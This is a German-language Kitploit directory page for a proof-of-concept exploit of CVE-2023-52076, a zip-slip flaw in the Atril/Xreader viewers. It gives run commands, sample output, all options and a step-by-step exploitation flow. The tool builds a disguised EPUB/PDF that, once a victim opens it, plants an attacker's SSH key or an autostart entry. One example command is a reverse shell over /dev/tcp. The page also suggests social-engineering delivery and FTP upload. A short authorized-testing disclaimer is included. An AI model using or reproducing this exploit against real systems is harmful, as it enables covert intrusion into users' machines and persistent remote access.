Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-52076-PoC — PoC-Exploit für CVE-2023-52076 – Zip-Slip-Pfad-Traversal in Atril/Xreader (MATE/Cinnamon), das das Schreiben beliebiger Dateien und RCE über manipulierte EPUB-Dateien ermöglicht. Nur für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/groppoxx/cve-2023-52076-poc
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsSocial EngineeringBinary-Exploitation
GitHubgroppoxx/cve-2023-52076-poc

CVE-2023-52076-PoC

PoC-Exploit für CVE-2023-52076 – Zip-Slip-Pfad-Traversal in Atril/Xreader (MATE/Cinnamon), das das Schreiben beliebiger Dateien und RCE über manipulierte EPUB-Dateien ermöglicht. Nur für autorisierte Sicherheitstests.

Repository anzeigen
3vor 24 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-52076-PoC

Proof-of-Concept für CVE-2023-52076, eine kritische Path-Traversal- und Arbitrary-File-Write-Schwachstelle in den Dokumentbetrachtern Atril/Xreader, die MATE-Desktop-Umgebungen betrifft.

Das Skript erzeugt ein präpariertes EPUB-Payload mit Zip-Slip-Pfaden, die entweder auf die SSH-Konfiguration oder Autostart-Desktop-Einträge abzielen und so entfernte Befehlsausführung auf den Zielsystemen ermöglicht.

Was es tut

  1. Unterstützt zwei Ausführungsmodi: SSH-Schlüsselinjektion oder Autostart-RCE.
  2. Erzeugt ein RSA-Schlüsselpaar (nur SSH-Modus).
  3. Baut ein gültiges EPUB mit eingebetteten Zip-Slip-Pfaden auf, die auf eine anfällige Extraktion abzielen.
  4. Schreibt das Payload in 5-9 Traversal-Pfadvarianten unter Verwendung von /proc/self/cwd-Gadgets.
  5. Erstellt .epub- und .pdf-Kopien (beide lösen die Schwachstelle aus).
  6. Validiert die Payload-Struktur und überprüft alle Einträge.
  7. Lädt das Payload optional über anonymes FTP hoch.

Anforderungen

root@kitploit:~
Python 3.8+
ssh-keygen in PATH (SSH mode only)

Schnellstart

SSH-Modus (Empfohlen)

SSH-Payload lokal erzeugen:

root@kitploit:~
python3 cve_2023_52076.py --mode ssh

Autostart-Modus

Autostart-RCE-Payload mit eigenem Befehl erzeugen:

root@kitploit:~
python3 cve_2023_52076.py --mode autostart --command "id > /tmp/pwned.txt"

Vollständiges Beispiel

SSH-Modus mit FTP-Upload

root@kitploit:~
python3 cve_2023_52076.py \
  --mode ssh \
  --name slippy-ssh \
  --key ./keys/atril_rsa \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

Beispielausgabe:

root@kitploit:~
[2026-07-27T14:23:45Z] [*] Generating RSA-3072 keypair: ./keys/atril_rsa
[2026-07-27T14:23:47Z] [*] Building EPUB with 9 zip-slip entries
[2026-07-27T14:23:47Z] [*] Validating payload: ./payloads/slippy-ssh.epub
[2026-07-27T14:23:47Z] [+] Validated 9 payload entries
[2026-07-27T14:23:47Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:23:48Z] [*] Uploading ./payloads/slippy-ssh.epub as slippy-ssh.epub
[2026-07-27T14:23:48Z] [+] Upload complete. Remote directory listing:
-rw-r--r-- 1 0 0 2048 Jul 27 14:23 slippy-ssh.epub

[+] Payload ready
Mode:        SSH (authorized_keys)
Private key: ./keys/atril_rsa (mode 600)
Public key:  ./keys/atril_rsa.pub
Fingerprint: 3072 SHA256:abcd1234... atril-poc (RSA)
EPUB:        ./payloads/slippy-ssh.epub
PDF copy:    ./payloads/slippy-ssh.pdf

[+] SSH login remains manual:
    ssh -i ./keys/atril_rsa -o IdentitiesOnly=yes <user>@<target>

Autostart-Modus mit FTP-Upload

root@kitploit:~
python3 cve_2023_52076.py \
  --mode autostart \
  --command "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" \
  --name slippy-rce \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

Beispielausgabe:

root@kitploit:~
[2026-07-27T14:25:10Z] [*] Building EPUB with 5 zip-slip entries
[2026-07-27T14:25:10Z] [*] Validating payload: ./payloads/slippy-rce.epub
[2026-07-27T14:25:10Z] [+] Validated 5 payload entries
[2026-07-27T14:25:10Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:25:11Z] [*] Uploading ./payloads/slippy-rce.epub as slippy-rce.epub
[2026-07-27T14:25:11Z] [+] Upload complete.

[+] Payload ready
Mode:       Autostart (.desktop RCE)
Command:    bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
EPUB:       ./payloads/slippy-rce.epub
PDF copy:   ./payloads/slippy-rce.pdf

[+] Victim must logout/login for autostart to trigger

Optionale Flags

root@kitploit:~
--mode {ssh,autostart}
   Payload mode. Default: ssh
   ssh: Inject SSH authorized_keys (no victim interaction needed after file opens).
   autostart: Create .desktop RCE in autostart (triggers on next logout/login).

--command <CMD>
   Payload command for --mode autostart. Required if --mode autostart.
   Example: --command "id > /tmp/pwned.txt"

--name <NAME>
   Local payload basename. Default: base-clean

--key <PATH>
   Private key path (SSH mode only). Default: slippy_rsa

--key-bits <BITS>
   RSA key size (SSH mode only). Options: 2048, 3072, 4096. Default: 3072

--output-dir <DIR>
   Output directory for .epub/.pdf. Default: output

--upload
   Upload the payload to FTP after generating.

--host <HOST>
   FTP target host or IP. Required if --upload is set.

--port <PORT>
   FTP port. Default: 21

--ftp-dir <DIR>
   Remote FTP directory, e.g. pub.

--ftp-user <USER>
   FTP username. Default: anonymous

--ftp-password <PWD>
   FTP password. Default: anonymous@

--remote-name <NAME>
   Remote EPUB filename. Default: ludwig.epub

--upload-pdf
   Upload the .pdf copy instead of the .epub.

--force
   Replace existing output and key files.

--timeout <SECONDS>
   FTP connection timeout. Default: 10.0

--only-final
   Hide progress logs and print only the final summary.

--no-color
   Disable ANSI colors.

--debug
   Print executed subprocess commands (ssh-keygen).

Ablauf der Ausnutzung

SSH-Modus

  1. Payload erzeugen: Das Skript erstellt ein EPUB mit öffentlichem Schlüssel in authorized_keys-Pfaden.
  2. Social Engineering: EPUB/PDF an das Ziel senden (als E-Book getarnt).
  3. Opfer öffnet die Datei: Atril/Xreader extrahiert den EPUB-Inhalt.
  4. Path Traversal: Der anfällige Code schreibt den öffentlichen Schlüssel nach ~/.ssh/authorized_keys.
  5. SSH-Zugriff: Der Angreifer verbindet sich mit dem privaten Schlüssel.

Autostart-Modus

  1. Payload erzeugen: Das Skript erstellt ein EPUB mit einem .desktop-Eintrag in Autostart-Pfaden.
  2. Social Engineering: EPUB/PDF an das Ziel senden.
  3. Opfer öffnet die Datei: Atril/Xreader extrahiert den EPUB-Inhalt.
  4. Path Traversal: Der anfällige Code schreibt .desktop nach ~/.config/autostart/.
  5. Auslösung: Beim nächsten Abmelden/Anmelden führt die .desktop-Datei den Befehl automatisch aus.

Wichtige Punkte

  • Kein Benutzername erforderlich: /proc/self/cwd-Gadget wird zum Zeitpunkt der Extraktion aufgelöst.
  • Mehrere Pfadvarianten: 9 Pfade für SSH, 5 für Autostart, maximiert den Erfolg über Verzeichnistiefen hinweg.
  • Kein Überschreiben von Dateien: Es werden nur neue Dateien erstellt (respektiert die CVE-Einschränkung).
  • Offline-Modus: Payloads ohne FTP-Zustellung erzeugen (--upload nur bei Bedarf verwenden).
  • Flexible Befehle: Der Autostart-Modus unterstützt beliebige Bash-Befehle.
  • SSH-Modus ist sofort wirksam: Keine Interaktion mit dem Opfer nach dem Öffnen der Datei.
  • Autostart erfordert erneutes Anmelden: Das Opfer muss sich ab-/anmelden, damit die RCE ausgelöst wird.

Hinweise

  • Betroffene Versionen: Atril (MATE DE), Xreader (Cinnamon, Linux Mint) < 1.26.2.
  • Getestet auf: Kali Linux, Parrot OS, Ubuntu-Mate, Xubuntu.
  • Erfordert, dass das Opfer das präparierte Dokument im anfälligen Betrachter öffnet.
  • Funktioniert offline; kein Netzwerk-Rückkanal zum Angreifer während der Ausnutzung.
  • Best Practice: Zustellung über FTP (--upload), um direktes Hosten zu vermeiden.

Rechtliches

Dieses PoC ist für autorisierte Sicherheitstests, Laborumgebungen und die Überprüfung von Schwachstellen gedacht. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.

Tool herunterladen